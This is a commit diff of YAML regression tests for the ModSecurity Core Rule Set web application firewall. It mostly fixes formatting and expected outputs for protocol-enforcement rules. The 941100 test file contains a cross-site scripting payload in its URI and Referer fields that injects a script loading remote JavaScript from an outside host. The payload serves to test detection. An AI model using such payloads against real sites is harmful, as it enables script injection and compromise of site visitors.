Merge branch 'v3.2/dev' into v3.3/dev

Author: lifeforms

util/regression-tests/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920180.yaml

@@ -1,54 +1,52 @@
 ---
-  meta: 
+  meta:
     author: "csanders-git"
     enabled: true
     name: "920180.yaml"
     description: "Description"
-  tests: 
-    - 
+  tests:
+    -
       test_title: 920180-1
-      stages: 
-        - 
-          stage: 
+      stages:
+        -
+          stage:
             input:
               dest_addr: "127.0.0.1"
               method: "POST"
               port: 80
               headers:
-                  User-Agent: "ModSecurity CRS 3 Tests"              
+                  User-Agent: "ModSecurity CRS 3 Tests"
                   Host: "localhost"
                   Content-Type: "application/x-www-form-urlencoded"
               data: "hi=test"
               protocol: "http"
-              stop_magic: True
+              stop_magic: true
               uri: "/"
             output:
-              status: 200
-              # No Content length is sent this will cause issues
-              #expect_error: True
-    - 
+              status: [200, 411]
+    -
       test_title: 920180-2
-      stages: 
-        - 
-          stage: 
+      stages:
+        -
+          stage:
             input:
               dest_addr: "127.0.0.1"
               method: "POST"
               port: 80
               headers:
-                  User-Agent: "ModSecurity CRS 3 Tests"              
+                  User-Agent: "ModSecurity CRS 3 Tests"
                   Host: "localhost"
                   Content-Type: "application/x-www-form-urlencoded"
               data: "hi=test"
               protocol: "http"
               uri: "/"
-            output: 
-              no_log_contains: id "920180"              
-    - 
+            output:
+              no_log_contains: id "920180"
+    -
       test_title: 920180-3
       desc: POST request missing Content-Length Header (920180) from old modsec regressions
       stages:
-      - 
+      -
         stage:
           input:
             dest_addr: 127.0.0.1

util/regression-tests/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920280.yaml

@@ -1,47 +1,47 @@
 ---
-  meta: 
+  meta:
     author: "csanders-git"
     enabled: true
     name: "920280.yaml"
     description: "Description"
-  tests: 
-    - 
+  tests:
+    -
       test_title: 920280-1
-      stages: 
-        - 
-          stage: 
+      stages:
+        -
+          stage:
             input:
               dest_addr: "127.0.0.1"
               port: 80
+              version: "HTTP/1.0"
               headers:
-                  User-Agent: "ModSecurity CRS 3 Tests # HTTP 1.1 requires"
-            output: 
-              no_log_contains: "id \"920280\""
-    - 
+                  User-Agent: "ModSecurity CRS 3 Tests"
+            output:
+              log_contains: "id \"920280\""
+    -
       test_title: 920280-2
-      stages: 
-        - 
-          stage: 
+      stages:
+        -
+          stage:
             input:
               dest_addr: "127.0.0.1"
               port: 80
               headers:
                   User-Agent: "ModSecurity CRS 3 Tests"
                   Host: "localhost"
-            output: 
-              no_log_contains: "id \"920280\""     
-    - 
+            output:
+              no_log_contains: "id \"920280\""
+    -
       test_title: 920280-3
-      stages: 
-        - 
-          stage: 
+      stages:
+        -
+          stage:
             input:
               dest_addr: "127.0.0.1"
               port: 80
               version: "HTTP/0.9"
               headers:
                   User-Agent: "ModSecurity CRS 3 Tests"
             output:
-              # Technically valid but Apache doesn't allow 0.9 anymore 
+              # Technically valid but Apache doesn't allow 0.9 anymore
               status: 400
-                                                 

util/regression-tests/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920400.yaml

@@ -49,4 +49,4 @@
                 # Most web servers simply won't respond to invalid requests like
                 # like this they'll just time out when we get OR type checks 
                 # we'll be able to check for both an error or the rule firing
-                expect_error: True
+                expect_error: true

util/regression-tests/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920430.yaml

@@ -78,7 +78,7 @@
                   User-Agent: "ModSecurity CRS 3 Tests #FN"
                   Host: "localhost"
             output: 
-                  expect_error: True 
+                  expect_error: true
     - 
       test_title: 920430-6
       stages: 

util/regression-tests/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941100.yaml

@@ -1,31 +1,31 @@
 ---
-  meta: 
+  meta:
     author: "csanders-git"
     enabled: true
     name: "941100.yaml"
     description: "Tests to trigger, or not trigger 941100"
-  tests: 
-    - 
-      test_title: 941100-1FN
+  tests:
+    -
+      test_title: 941100-1
       desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/
       stages:
-      - 
+      -
         stage:
           input:
             dest_addr: 127.0.0.1
             method: GET
             port: 80
-            uri: '/demo/xss/xml/vuln.xml.php?input=<script xmlns="http://www.w3.org/1999/xhtml">setTimeout("top.frame2.location=\"javascript:(function () {var x = document.createElement(\\\"script\\\");x.src = \\\"//sdl.me/popup.js?//\\\";document.childNodes\[0\].appendChild(x);}());\"",1000)</script>&//'
+            uri: '/demo/xss/xml/vuln.xml.php?input=<script+xmlns="http://www.w3.org/1999/xhtml">setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)</script>&//'
             headers:
               User-Agent: ModSecurity CRS 3 Tests
               Host: localhost
           output:
-            no_log_contains: id "941100"
-    - 
+            log_contains: id "941100"
+    -
       test_title: 941100-2
       desc: XSS in XML Test as described in http://www.client9.com/article/five-interesting-injection-attacks/
       stages:
-      - 
+      -
         stage:
           input:
             dest_addr: 127.0.0.1
@@ -37,11 +37,11 @@
               Host: localhost
           output:
             log_contains: id "941100"
-    - 
+    -
       test_title: 941100-3
       desc: XSS testing of libinjection in User-Agent
       stages:
-      - 
+      -
         stage:
           input:
             dest_addr: 127.0.0.1
@@ -53,11 +53,11 @@
               Host: localhost
           output:
             log_contains: id "941100"
-    - 
+    -
       test_title: 941100-4
       desc: XSS testing of libinjection in User-Agent
       stages:
-      - 
+      -
         stage:
           input:
             dest_addr: 127.0.0.1
@@ -70,11 +70,11 @@
               Host: localhost
           output:
             no_log_contains: id "941100"
-    - 
+    -
       test_title: 941100-5FN
       desc: XSS testing of libinjection in User-Agent
       stages:
-      - 
+      -
         stage:
           input:
             dest_addr: 127.0.0.1
@@ -83,7 +83,7 @@
             uri: /
             headers:
               User-Agent: ModSecurity CRS 3 Tests
-              Referer: '/demo/xss/xml/vuln.xml.php?input=<script xmlns="http://www.w3.org/1999/xhtml">setTimeout("top.frame2.location=\"javascript:(function () {var x = document.createElement(\\\"script\\\");x.src = \\\"//sdl.me/popup.js?//\\\";document.childNodes\[0\].appendChild(x);}());\"",1000)</script>&//'
+              Referer: '/demo/xss/xml/vuln.xml.php?input=<script+xmlns="http://www.w3.org/1999/xhtml">setTimeout("top.frame2.location="javascript:(function+()+{var+x+=+document.createElement(\\"script\\");x.src+=+\\"//sdl.me/popup.js?//\\";document.childNodes\\[0\\].appendChild(x);}());"",1000)</script>&//'
               Host: localhost
           output:
             no_log_contains: id "941100"